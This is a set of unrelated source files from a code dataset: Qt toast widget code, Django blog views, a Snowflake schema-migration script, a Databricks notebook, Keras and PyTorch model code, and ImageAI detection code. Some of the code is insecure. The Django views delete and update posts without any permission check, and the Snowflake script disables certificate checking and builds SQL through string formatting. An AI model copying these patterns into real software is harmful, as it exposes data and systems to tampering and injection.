\"\"\"\n Sets how long to show the toast (in milliseconds)\n :param duration: int\n \"\"\"\n\n self._duration = duration\n\n def text_rect(self):\n \"\"\"\n Returns the bounding box rect for the text\n :return: QRect\n \"\"\"\n\n text = self.text()\n font 
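# Aside: the fade used by BaseToast above, reduced to its core: animate the
# widget's windowOpacity property and reverse the animation direction to fade
# out. A sketch; the import path follows the Qt.py convention used in this file.
from Qt.QtCore import QPropertyAnimation, QEasingCurve, QAbstractAnimation

def make_fade(widget, duration_ms=300):
    anim = QPropertyAnimation(widget, b'windowOpacity')
    anim.setDuration(duration_ms)
    anim.setEasingCurve(QEasingCurve.OutCubic)
    anim.setStartValue(0.0)
    anim.setEndValue(1.0)
    return anim

# fade in:  make_fade(widget).start()
# fade out: anim.setDirection(QAbstractAnimation.Backward); anim.start()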
= self.font()\n metrics = QFontMetricsF(font)\n\n return metrics.boundingRect(text)\n\n def text_width(self):\n \"\"\"\n Returns the width of the text\n :return: int\n \"\"\"\n\n text_width = self.text_rect().width()\n return max(0, text_width)\n\n def text_height(self):\n \"\"\"\n Returns the height of the text\n :return: int\n \"\"\"\n\n text_height = self.text_rect().height()\n return max(0, text_height)\n\n def _on_fade_out(self, duration=250):\n \"\"\"\n Internal callback function that fades out the toast message\n :param duration: int\n \"\"\"\n\n animation.fade_out_widget(self, duration=duration, on_finished=self.hide)\n","sub_path":"tpDcc/libs/qt/widgets/toast.py","file_name":"toast.py","file_ext":"py","file_size_in_byte":8773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363874105","text":"\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import *\nfrom django.views.generic.base import View\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.views.generic import ListView\nfrom pure_pagination.mixins import PaginationMixin\n# from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\n\nfrom comments.models import Comment\nfrom comments.forms import CommentForm\nfrom .forms import PostModelForm\nfrom .models import Post\nfrom .utils import count_words, get_read_time\n\n\nclass posts_listView(View):\n def get(self, request):\n queryset_list = Post.objects.active()\n query = request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(title__icontains=query) |\n Q(content__icontains=query) |\n Q(user__username=query) |\n Q(user__first_name__icontains=query) |\n Q(user__last_name__icontains=query)\n ).distinct()\n paginator = Paginator(queryset_list, 3) # Show 5 per page\n page = request.GET.get('page', 1)\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n queryset = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 
9999), deliver last page of results.\n            queryset = paginator.page(paginator.num_pages)\n        context = {\n            'object_list': queryset\n        }\n        return render(request, \"post_list.html\", context)\n\n\nclass posts_detailView(View):\n    def get(self, request, slug):\n        instance = get_object_or_404(Post, slug=slug)\n        initial_data = {\n            \"content_type\": instance.get_content_type,\n            \"object_id\": instance.id\n        }\n        comments = instance.comments\n        comment_form = CommentForm(initial=initial_data)\n\n        context = {\n            'instance': instance,\n            'comments': comments,\n            'comment_form': comment_form\n        }\n        return render(request, \"post_detail.html\", context)\n\n    # handles comment submission (newly added)\n    def post(self, request, slug):\n        instance = get_object_or_404(Post, slug=slug)\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            c_type = form.cleaned_data.get(\"content_type\")\n            # look up the model record for a given app (content_type.model_class() returns that model directly)\n            content_type = ContentType.objects.get(app_label='posts', model=c_type)\n            obj_id = form.cleaned_data.get(\"object_id\")\n            content_data = form.cleaned_data.get(\"content\")\n            parent_obj = None\n            try:\n                parent_id = int(request.POST.get(\"parent_id\"))\n            except:\n                parent_id = None\n\n            if parent_id:\n                parent_obj = Comment.objects.get(id=parent_id)\n\n            new_comment, created = Comment.objects.get_or_create(\n                user=request.user,\n                content_type=content_type,\n                object_id=obj_id,\n                content=content_data,\n                parent=parent_obj,\n            )\n            return HttpResponseRedirect(new_comment.content_object.get_absolute_url())\n        return render(request, \"post_detail.html\", {})\n\n\nclass posts_createView(View):\n\n    def get(self, request):\n        postform = PostModelForm()\n        return render(request, \"post_form.html\", {\"form\": postform})\n\n    def post(self, request):\n        if request.user.is_staff or request.user.is_superuser:\n            postform = PostModelForm(request.POST, request.FILES)\n            if postform.is_valid():\n                postform.save()\n                return redirect(\"posts:list\")\n            else:\n                return render(request, \"post_form.html\", {\"form\": postform})\n        else:\n            raise Http404\n\n\nclass posts_updateView(View):\n    def get(self, request, slug):\n        instance = get_object_or_404(Post, slug=slug)\n        form = PostModelForm(instance=instance)\n        return render(request, \"post_form.html\", {\"form\": form, \"instance\": instance})\n\n    def post(self, request, slug):\n        instance = get_object_or_404(Post, slug=slug)\n        form = PostModelForm(request.POST, request.FILES, instance=instance)\n        if form.is_valid():\n            form.save()\n            return HttpResponseRedirect(instance.get_absolute_url())\n        else:\n            return render(request, \"post_form.html\", {\"form\": form})\n\n\nclass posts_deleteView(View):\n    def get(self, request, slug):\n        instance = get_object_or_404(Post, slug=slug)\n        instance.delete()\n        return redirect(\"posts:list\")\n\n\n","sub_path":"blog/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"125923029","text":"import argparse\nimport hashlib\nimport os\nimport re\nimport snowflake.connector\nimport sys\nimport time\n\n# Set a few global variables here\n_snowchange_version = '2.1.0'\n_metadata_database_name = 'METADATA'\n_metadata_schema_name = 'SNOWCHANGE'\n_metadata_table_name = 'CHANGE_HISTORY'\n\n\ndef snowchange(root_folder, snowfl_acct_type, change_history_table_override, autocommit, verbose):\n    root_folder = os.path.abspath(root_folder)\n    if not os.path.isdir(root_folder):\n        raise ValueError(\"Invalid root folder: %s\" % root_folder)\n\n    
print(\"snowchange version: %s\" % _snowchange_version)\n print(\"Using root folder %s\" % root_folder)\n\n os.environ[\"SNOWFLAKE_AUTHENTICATOR\"] = 'snowflake'\n\n scripts_skipped = 0\n scripts_applied = 0\n\n # Get the change history table details\n change_history_table = get_change_history_table_details(change_history_table_override)\n\n # Create the change history table (and containing objects) if it don't exist.\n create_change_history_table_if_missing(snowfl_acct_type, change_history_table, autocommit, verbose)\n print(\"Using change history table %s.%s.%s\" % (\n change_history_table['database_name'], change_history_table['schema_name'], change_history_table['table_name']))\n\n # Find the max published version\n # TODO: Figure out how to directly SELECT the max value\n # from Snowflake with a SQL version of the sorted_alphanumeric() logic\n max_published_version = ''\n change_history = fetch_change_history(snowfl_acct_type, change_history_table, autocommit, verbose)\n if change_history:\n change_history_sorted = sorted_alphanumeric(change_history)\n max_published_version = change_history_sorted[-1]\n max_published_version_display = max_published_version\n if max_published_version_display == '':\n max_published_version_display = 'None'\n print(\"Max applied change script version: %s\" % max_published_version_display)\n if verbose:\n print(\"Change history: %s\" % change_history)\n\n # Find all scripts in the root folder (recursively) and sort them correctly\n all_scripts = get_all_scripts_recursively(root_folder, verbose)\n all_script_names = list(all_scripts.keys())\n all_script_names_sorted = sorted_alphanumeric(all_script_names)\n\n # Loop through each script in order and apply any required changes\n for script_name in all_script_names_sorted:\n script = all_scripts[script_name]\n\n # Only apply a change script if the version is newer than the most recent change in the database\n if get_alphanum_key(script['script_version']) <= get_alphanum_key(max_published_version):\n if verbose:\n print(\"Skipping change script %s because it's older than the most recently applied change (%s)\" % (\n script['script_name'], max_published_version))\n scripts_skipped += 1\n continue\n\n print(\"Applying change script %s\" % script['script_name'])\n apply_change_script(snowfl_acct_type, script, change_history_table, autocommit, verbose)\n scripts_applied += 1\n\n print(\"Successfully applied %d change scripts (skipping %d)\" % (scripts_applied, scripts_skipped))\n print(\"Completed successfully\")\n\n\n# This function will return a list containing the parts of the key (split by number parts)\n# Each number is converted to and integer and string parts are left as strings\n# This will enable correct sorting in python when the lists are compared\n# e.g. 
get_alphanum_key('1.2.2') results in ['', 1, '.', 2, '.', 2, '']\ndef get_alphanum_key(key):\n    convert = lambda text: int(text) if text.isdigit() else text.lower()\n    alphanum_key = [convert(c) for c in re.split('([0-9]+)', key)]\n    return alphanum_key\n\n\ndef sorted_alphanumeric(data):\n    return sorted(data, key=get_alphanum_key)\n\n\ndef get_all_scripts_recursively(root_directory, verbose):\n    all_files = dict()\n    all_versions = list()\n    # Walk the entire directory structure recursively\n    for (directory_path, directory_names, file_names) in os.walk(root_directory):\n        for file_name in file_names:\n            file_full_path = os.path.join(directory_path, file_name)\n            script_name_parts = re.search(r'^([V])(.+)__(.+)\\.sql$', file_name.strip())\n\n            # Only process valid change scripts\n            if script_name_parts is None:\n                if verbose:\n                    print(\"Ignoring non-change file \" + file_full_path)\n                continue\n\n            # Add this script to our dictionary (as nested dictionary)\n            script = dict()\n            script['script_name'] = file_name\n            script['script_full_path'] = file_full_path\n            script['script_type'] = script_name_parts.group(1)\n            script['script_version'] = script_name_parts.group(2)\n            script['script_description'] = script_name_parts.group(3).replace('_', ' ').capitalize()\n            all_files[file_name] = script\n\n            # Throw an error if the same version exists more than once\n            if script['script_version'] in all_versions:\n                raise ValueError(\"The script version %s exists more than once (second instance %s)\" % (\n                    script['script_version'], script['script_full_path']))\n            all_versions.append(script['script_version'])\n\n    return all_files\n\n\ndef execute_snowflake_query(snowfl_acct_type, snowflake_database, query, autocommit, verbose):\n    if snowfl_acct_type == 'TEST':\n        con = snowflake.connector.connect(\n            user='MATILLION',\n            password=os.environ['SNOWFL_MTL_PW'],\n            account=os.environ['SNOWFL_TST_ACCT'],\n            port=os.environ['SNOWFL_TST_PORT'], # use port forwarding from local machine\n            insecure_mode=True, # disable OCSP checking from local machine\n            warehouse=\"COMPUTE\",\n            database=snowflake_database,\n        )\n    else:\n        print('Only use Snowflake test instance for POC, exiting program...')\n        sys.exit(1)\n\n    if not autocommit:\n        con.autocommit(False)\n\n    if verbose:\n        print(\"SQL query: %s\" % query)\n\n    try:\n        res = con.execute_string(query)\n        if not autocommit:\n            con.commit()\n        return res\n    except Exception as e:\n        if not autocommit:\n            con.rollback()\n        raise e\n    finally:\n        con.close()\n\n\ndef get_change_history_table_details(change_history_table_override):\n    # Start with the global defaults\n    details = dict()\n    details['database_name'] = _metadata_database_name.upper()\n    details['schema_name'] = _metadata_schema_name.upper()\n    details['table_name'] = _metadata_table_name.upper()\n\n    # Then override the defaults if requested. 
The name could be in one, two or three part notation.\n if change_history_table_override is not None:\n table_name_parts = change_history_table_override.strip().split('.')\n\n if len(table_name_parts) == 1:\n details['table_name'] = table_name_parts[0].upper()\n elif len(table_name_parts) == 2:\n details['table_name'] = table_name_parts[1].upper()\n details['schema_name'] = table_name_parts[0].upper()\n elif len(table_name_parts) == 3:\n details['table_name'] = table_name_parts[2].upper()\n details['schema_name'] = table_name_parts[1].upper()\n details['database_name'] = table_name_parts[0].upper()\n else:\n raise ValueError(\"Invalid change history table name: %s\" % change_history_table_override)\n\n return details\n\n\ndef create_change_history_table_if_missing(snowfl_acct_type, change_history_table, autocommit, verbose):\n # Create the database if it doesn't exist\n query = \"CREATE DATABASE IF NOT EXISTS {0}\".format(change_history_table['database_name'])\n execute_snowflake_query(snowfl_acct_type, '', query, autocommit, verbose)\n\n # Create the schema if it doesn't exist\n query = \"CREATE SCHEMA IF NOT EXISTS {0}\".format(change_history_table['schema_name'])\n execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n # Finally, create the change history table if it doesn't exist\n query = \"CREATE TABLE IF NOT EXISTS {0}.{1} (VERSION VARCHAR, DESCRIPTION VARCHAR, SCRIPT VARCHAR, SCRIPT_TYPE VARCHAR, CHECKSUM VARCHAR, EXECUTION_TIME NUMBER, STATUS VARCHAR, INSTALLED_BY VARCHAR, INSTALLED_ON TIMESTAMP_LTZ)\".format(\n change_history_table['schema_name'], change_history_table['table_name'])\n execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n\ndef fetch_change_history(snowflake_acct_type, change_history_table, autocommit, verbose):\n query = 'SELECT VERSION FROM {0}.{1}'.format(change_history_table['schema_name'],\n change_history_table['table_name'])\n results = execute_snowflake_query(snowflake_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n # Collect all the results into a list\n change_history = list()\n for cursor in results:\n for row in cursor:\n change_history.append(row[0])\n\n return change_history\n\n\ndef apply_change_script(snowfl_acct_type, script, change_history_table, autocommit, verbose):\n # First read the contents of the script\n with open(script['script_full_path'], 'r') as content_file:\n content = content_file.read().strip()\n content = content[:-1] if content.endswith(';') else content\n\n # Define a few other change related variables\n checksum = hashlib.sha224(content.encode('utf-8')).hexdigest()\n execution_time = 0\n status = 'Success'\n\n # Execute the contents of the script\n if len(content) > 0:\n start = time.time()\n execute_snowflake_query(snowfl_acct_type, '', content, autocommit, verbose)\n end = time.time()\n execution_time = round(end - start)\n\n # Finally record this change in the change history table\n query = \"INSERT INTO {0}.{1} (VERSION, DESCRIPTION, SCRIPT, SCRIPT_TYPE, CHECKSUM, EXECUTION_TIME, STATUS, INSTALLED_BY, INSTALLED_ON) values ('{2}','{3}','{4}','{5}','{6}',{7},'{8}','{9}',CURRENT_TIMESTAMP);\".format(\n change_history_table['schema_name'], change_history_table['table_name'], script['script_version'],\n script['script_description'], script['script_name'], script['script_type'], checksum, execution_time, status,\n os.environ[\"SNOWFLAKE_USER\"])\n 
execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Parses command line arguments')\n parser.add_argument('-f', '--root-folder', type=str, default=\".\",\n help='The root folder for the database change scripts')\n parser.add_argument('-t', '--snowflake_acct_type', type=str, choices=['PROD', 'TEST'],\n help='Snowflake connection account type')\n parser.add_argument('-d', '--database', type=str, default='ENTERPRISE', help='Database to traverse')\n parser.add_argument('-s', '--schema', type=str, default='DATA_LAKE', help='Schema to traverse')\n parser.add_argument('-c', '--change-history-table', type=str,\n help='Used to override the default name of the change history table '\n '(e.g. METADATA.SNOWCHANGE.CHANGE_HISTORY)',\n required=False)\n parser.add_argument('-ac', '--autocommit', action='store_true')\n parser.add_argument('-v', '--verbose', action='store_true')\n args = parser.parse_args()\n\n snowchange(args.root_folder, args.snowflake_acct_type, args.change_history_table, args.autocommit, args.verbose)\n\n # cur.close()\n # con.close()\n\n\ntry:\n main()\nexcept Exception as err:\n print(err)\n sys.exit(1)\n","sub_path":"snowchange.py","file_name":"snowchange.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329778315","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC COPYRIGHT: Columbia Sportswear 2019
\n# MAGIC DESCRIPTION: Publishes OMNI Planning Location table imported from Excel UMT\n# MAGIC \n# MAGIC -----------------------------------------------------------------\n# MAGIC ###### MODIFICATION LOG\n# MAGIC | Programmmer| Change Request| Date| Change Description|\n# MAGIC |----------------------|-----------------|------------|--------------------------------------------------------------------|\n# MAGIC | Kelly Jain| Created| 11/06/2019| Omni Planning SIT2 release 20200422|\n\n# COMMAND ----------\n\n#edw_lnd_umt.umt_planning_location\n\n# COMMAND ----------\n\nfrom functools import reduce\nfrom datetime import datetime, timedelta\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType,DateType,StringType,LongType,DoubleType\nfrom pyspark.sql.functions import (col,when,current_timestamp,current_date,date_format,split,coalesce,lit,DataFrame,row_number,date_sub,next_day,substring,trunc,rtrim,concat,min,max,sum,asc,desc,trim,month,year,monotonically_increasing_id)\nfrom pyspark.sql.window import Window\nfrom delta.tables import *\n\n# COMMAND ----------\n\n#Check for existence of Destination then pick appropriate data from Source\ntblList = sqlContext.tableNames('entpr_plng_app')\nif 'planning_location' not in tblList:\n a = spark.table('edw_lnd_umt.umt_planning_location').agg({'EDW_UPDT_TS':'max'})\n va = a.distinct().collect()[0][0]\n location_df1 = spark.table('edw_lnd_umt.umt_planning_location').where(col('EDW_UPDT_TS') == va)\nelse:\n a = spark.table('edw_lnd_umt.umt_planning_location').agg({'EDW_UPDT_TS':'max'})\n b = spark.table('entpr_plng_app.planning_location').agg({'EDW_UPDT_TS':'max'})\n va = a.distinct().collect()[0][0]\n vb = b.distinct().collect()[0][0]\n if va > vb:\n location_df1 = spark.table('edw_lnd_umt.umt_planning_location').where(col('EDW_UPDT_TS') == va)\n else:\n dbutils.notebook.exit(\"No new Location data\")\n \n\n# COMMAND ----------\n\nlocation_df11 = location_df1.filter((col('SubRegion') == 'EUR') & (col('StoreType').isNull())).withColumn('InventorySource',lit('SAP'))\nlocation_df12 = location_df1.filter((col('Region') == 'NA') & (col('StoreType').isNull())).withColumn('InventorySource',lit('SAP'))\nlocation_df13 = location_df1.filter((col('SubRegion') == 'EUR') & (col('StoreType').isNotNull())).withColumn('InventorySource',lit('JDA'))\nlocation_df14 = location_df1.filter((col('Region') == 'NA') & (col('StoreType').isNotNull())).withColumn('InventorySource',lit('D365'))\nlocation_df15 = location_df1.filter((col('SubRegion') == 'CHN')).withColumn('InventorySource',lit('SAP'))\nlocation_df16 = location_df1.filter((col('SubRegion') == 'JPN')).withColumn('InventorySource',lit('JDE'))\nlocation_df17 = location_df1.filter((col('Region') == 'IDR')).withColumn('InventorySource',lit(None))\nlocation_df18 = location_df1.filter((col('SubRegion') == 'KOR')).withColumn('InventorySource',lit(None))\nlocation_df19 = location_df1.filter((col('Region').isNull())).withColumn('InventorySource',lit(None))\nlocation_df20 =(location_df11.union(location_df12).union(location_df13).union(location_df14).union(location_df15).union(location_df16).union(location_df17).union(location_df18).union(location_df19))\n\n# COMMAND ----------\n\nlocation_df = location_df20.withColumn('OpenDate', coalesce(col('OpenDate'),lit('2000-01-01')).cast(DateType())).withColumn('CloseDate', coalesce(col('CloseDate'),lit('2099-12-31')).cast(DateType()))\n\n# COMMAND ----------\n\n#Publish to DBFS/ADLS\nspark.sql(\"CREATE DATABASE IF NOT EXISTS entpr_plng_app LOCATION 
'/mnt/entadls/published/eim/managed/'\")\nlocation_df.write.saveAsTable('entpr_plng_app.planning_location', format='delta', mode='overwrite')\n","sub_path":"C1-SIT3/entpr_plng_app/planning_location.py","file_name":"planning_location.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26681805","text":"import math\n\nimport numpy as np\nfrom keras import Input, Model, losses\nfrom keras.layers import Reshape, Convolution2D, Dense, \\\n UpSampling2D, Deconvolution2D, ZeroPadding2D, GaussianNoise, MaxPooling2D\n\nfrom latale.model.Autoencoder import Autoencoder\nfrom latale.model.Network import sequential, flatten\n\n\nclass ConvolutionalAutoencoder(Autoencoder):\n def __init__(self, path, net_name, optimizer=None):\n super().__init__(path, net_name, optimizer)\n self._loss = None\n self.features = None\n\n def build(self, input_shape):\n if self._built:\n return\n self._built = True\n\n _encoder = self.build_encoder(input_shape)\n _decoder = self.build_decoder(input_shape)\n\n x = Input(shape=input_shape)\n z = sequential([flatten, *_encoder])(x)\n y = sequential(_decoder)(flatten(z))\n\n z2 = Input(shape=(self._parameters['N'] * self._parameters['M'],))\n y2 = sequential(_decoder)(flatten(z2))\n w2 = sequential([*_encoder])(flatten(y2))\n\n self._loss = losses.mean_squared_error\n\n self.encoder = Model(x, z)\n self.decoder = Model(z2, y2)\n self.autoencoder = Model(x, y)\n self.autodecoder = Model(z2, w2)\n self.network = self.autoencoder\n\n def build_encoder(self, input_shape):\n # noinspection PyUnusedLocal\n return [Reshape((*input_shape, 1)),\n GaussianNoise(self._parameters['noise']),\n *[sequential([Convolution2D(self._parameters['clayer'], self._parameters['kernel'],\n kernel_initializer=self._parameters['kernel_initializer'],\n activation=self._parameters['activation'], padding='same',\n use_bias=False, ),\n MaxPooling2D(pool_size=(2, 2)), ])\n for i in range(self._parameters['num_clayers'])],\n flatten,\n Dense(self._parameters['N'] * self._parameters['M'],\n activation=self._parameters['bottleneck_activation']), ]\n\n def build_decoder(self, input_shape):\n # Compute dimensionality for outer layer\n dim_reduction = int(math.pow(2, self._parameters['num_clayers']))\n last_convolution = np.array(input_shape) // dim_reduction\n reconstruction = last_convolution * dim_reduction\n zero_pad = input_shape - reconstruction\n zero_pad = (int(zero_pad[0] / 2), int(zero_pad[0] - int(zero_pad[0] / 2))), (int(zero_pad[1] / 2), int(\n zero_pad[1] - int(zero_pad[1] / 2)))\n\n # noinspection PyUnusedLocal\n return [*[Dense(np.prod(last_convolution) * self._parameters['clayer'],\n activation=self._parameters['activation'], use_bias=False), ],\n Reshape((*last_convolution, self._parameters['clayer'])),\n *[sequential([UpSampling2D((2, 2)),\n Deconvolution2D(self._parameters['clayer'], self._parameters['kernel'],\n kernel_initializer=self._parameters['kernel_initializer'],\n activation=self._parameters['activation'], padding='same',\n use_bias=False), ])\n for i in range(self._parameters['num_clayers'] - 1)],\n # Last deconvolution must consider a single filter.\n *[UpSampling2D((2, 2)),\n Deconvolution2D(1, self._parameters['kernel'], activation=self._parameters['activation'],\n padding='same'), ],\n ZeroPadding2D(zero_pad),\n Reshape(input_shape), 
]\n","sub_path":"latale/latale/model/ConvolutionalAutoencoder.py","file_name":"ConvolutionalAutoencoder.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"326215049","text":"\n\n#Dette ser ut som fin kode, men jeg er litt usikker på hvordan printen takler int + string\n#Plusse forskjellige typer mot hverandre kan ofte skape litt problemer, og naa har vi castet inputet\n#over til et int. \n\na = input(\"Tast inn et heltall! \")\nb = int(a)\nif b <10:\n print (b + \"Hei!\")\n","sub_path":"oblig2/kodeforstaaelse.py","file_name":"kodeforstaaelse.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60599922","text":"import sys\n\n\ndef count_net_params(net, show_details=False):\n params = list(net.parameters())\n k = 0\n for i in params:\n l = 1\n for j in i.size():\n l *= j\n if show_details: print (\"Struct:\", list(i.size()), \" -- %d params\" % l)\n k += l\n if show_details: print (\"%d params in total\" % k)\n return k\n\n\ndef test_network(net, show_count=True):\n print (net)\n if show_count: print (count_net_params(net, True))\n sys.exit()\n","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267020948","text":"import pandas as pd\nimport numpy as np\nimport torch\n\nfrom pathlib import Path\nfrom preprocess import Tokenizer, Vocab\nfrom utils import check_labels, load_w2v_embedding, load_fasttext_embedding, pad_collate\nfrom torch.utils.data import Dataset, DataLoader\nfrom functools import partial\nfrom exp_config import TEXT_COL, LABEL_COLS, PAD_TOKEN\n\n\nclass TextLMData(): \n def __init__(self, \n path,\n csv,\n test_csv,\n text_col, \n label_cols, \n max_vocab,\n min_freq,\n valid_pct=0.2):\n \n self.path = path\n self.csv = csv\n self.test_csv = test_csv\n self.text_cols = text_col\n self.label_cols = label_cols\n self.valid_pct = valid_pct\n self.max_vocab = max_vocab\n self.min_freq = min_freq\n \n self.df = pd.read_csv(Path(self.path)/self.csv)\n if self.test_csv is not None: self.test_df = pd.read_csv(Path(self.path)/self.test_csv) \n self.cut = int(valid_pct * len(self.df)) + 1\n \n def process(self):\n tok = Tokenizer()\n \n # consider entire corpus as text ( train + test text columns )\n if self.test_csv:\n text = list(self.df.loc[:, self.text_cols].values) + list(self.test_df.loc[:, self.text_cols])\n else:\n text = list(self.df.loc[:, self.text_cols].values)\n \n self.tokens = [tok.tokenizer(x) for x in text]\n self.vocab = Vocab.create(self.tokens, self.max_vocab, self.min_freq)\n \n self.ntokens = [self.vocab.numericalize(t) for t in self.tokens]\n \n # only full training\n if self.valid_pct == 0 and self.test_csv is None:\n self.trn_ds = (self.ntokens, self.df.loc[:, self.label_cols].values)\n self.vld_ds = ([], [])\n self.test_ds = ([], [])\n \n # holdout\n elif self.valid_pct > 0 and self.test_csv is None:\n self.trn_ds = (self.ntokens[self.cut:], self.df.loc[:, self.label_cols].values[self.cut:])\n self.vld_ds = (self.ntokens[:self.cut], self.df.loc[:, self.label_cols].values[:self.cut])\n self.tst_ds = ([], [])\n \n # holdout and test prediction\n elif self.valid_pct > 0 and self.test_csv is not None:\n self.trn_tokens = self.ntokens[:len(self.df)]\n self.tst_ds = (self.ntokens[len(self.df):], [])\n \n trn_tokens = 
self.trn_tokens[self.cut:]\n vld_tokens = self.trn_tokens[:self.cut]\n \n self.trn_ds = (trn_tokens, self.df.loc[:, self.label_cols].values[self.cut:])\n self.vld_ds = (vld_tokens, self.df.loc[:, self.label_cols].values[:self.cut])\n \n # full training and test prediction\n else:\n self.trn_ds = (self.ntokens[:len(self.df)], self.df.loc[:, self.label_cols].values)\n self.vld_ds = ([], [])\n self.tst_ds = (self.ntokens[len(self.df):], [])\n \n return self.vocab, self.trn_ds, self.vld_ds, self.tst_ds\n \n def fill_emb_matrix(self, emb_type, embed_size):\n emb_matrix = np.random.random(size=(len(self.vocab.itos), embed_size))\n \n if emb_type == 'w2v':\n emb_matrix = load_w2v_embedding(emb_matrix, self.vocab, embed_size)\n elif emb_type == 'fasttext':\n emb_matrix = load_fasttext_embedding(emb_matrix, self.vocab, embed_size)\n \n return emb_matrix\n\n\nclass TextClassData(Dataset):\n def __init__(self, vocab, ds):\n self.vocab = vocab\n self.ds, self.y = ds\n \n def __len__(self):\n return len(self.ds)\n \n def __getitem__(self, index):\n x = torch.LongTensor(self.ds[index])\n y = None\n if len(self.y) > 0: y = torch.FloatTensor(self.y[index])\n \n return x, y\n\n\ndef make_dataset(config):\n\n path = Path(config['path'])\n csv = config['csv']\n text_col = TEXT_COL \n label_cols = LABEL_COLS\n test_csv = config['test_csv']\n max_vocab = config['max_vocab']\n min_freq = config['min_freq']\n embed_size = config['embed_size']\n emb_type = config['emb_type']\n valid_pct = config['valid_pct']\n\n lm = TextLMData(path,\n csv,\n test_csv,\n text_col,\n label_cols,\n max_vocab,\n min_freq,\n valid_pct=valid_pct)\n\n vocab, trn_ds, vld_ds, tst_ds = lm.process()\n emb_matrix = lm.fill_emb_matrix(emb_type, embed_size)\n \n return vocab, trn_ds, vld_ds, tst_ds, emb_matrix\n\n\ndef make_iterator(config, vocab, trn_ds, vld_ds, tst_ds):\n sent_len = config['sent_len']\n collate_fn = partial(pad_collate, pad_idx=vocab.stoi[PAD_TOKEN], sent_len=sent_len)\n \n trn_ds = TextClassData(vocab, trn_ds)\n if len(vld_ds) > 0: vld_ds = TextClassData(vocab, vld_ds)\n if len(tst_ds) > 0: tst_ds = TextClassData(vocab, tst_ds)\n\n trn_dl = DataLoader(trn_ds, batch_size=config['batch_size'], shuffle=True, collate_fn=collate_fn, num_workers=config['ncpus'])\n vld_dl, tst_dl = None, None\n\n if len(vld_ds) > 0: vld_dl = DataLoader(vld_ds, batch_size=config['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=config['ncpus'])\n if len(tst_ds) > 0: tst_dl = DataLoader(tst_ds, batch_size=config['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=config['ncpus'])\n \n return trn_dl, vld_dl, tst_dl\n","sub_path":"src/cnn_sent_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372816419","text":"from itertools import count\r\n\r\nimport cv2\r\n\r\nfrom imageai.Detection.keras_retinanet.models.resnet import resnet50_retinanet\r\nfrom imageai.Detection.keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\r\nfrom imageai.Detection.keras_retinanet.utils.visualization import draw_box, draw_caption\r\nfrom imageai.Detection.keras_retinanet.utils.colors import label_color\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as pltimage\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\n\r\n\r\ndef get_session():\r\n config = tf.ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n return 
tf.Session(config=config)\r\n\r\n\r\nclass ObjectDetection:\r\n    \"\"\"\r\n    This is the object detection class for images in the ImageAI library. It provides support for the RetinaNet\r\n    object detection network. After instantiating this class, you can set its properties and\r\n    make object detections using its pre-defined functions.\r\n\r\n    The following functions are required to be called before object detection can be made\r\n    * setModelPath()\r\n    * At least one of the following, and it must correspond to the model set in the setModelPath()\r\n    [setModelTypeAsRetinaNet(), setModelTypeAsYOLO()]\r\n    * loadModel() [This must be called once only before performing object detection]\r\n\r\n    Once the above functions have been called, you can call the detectObjectsFromImage() function of the object detection instance\r\n    object at any time to obtain observable objects in any image.\r\n    \"\"\"\r\n\r\n    def __init__(self):\r\n        self.__modelType = \"\"\r\n        self.modelPath = \"\"\r\n        self.__modelPathAdded = False\r\n        self.__modelLoaded = False\r\n        self.__model_collection = []\r\n\r\n        self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',\r\n                                 7: 'truck', 8: 'boat', 9: 'traffic light', 10: 'fire hydrant', 11: 'stop sign', 12: 'parking meter',\r\n                                 13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',\r\n                                 21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',\r\n                                 28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports ball', 33: 'kite',\r\n                                 34: 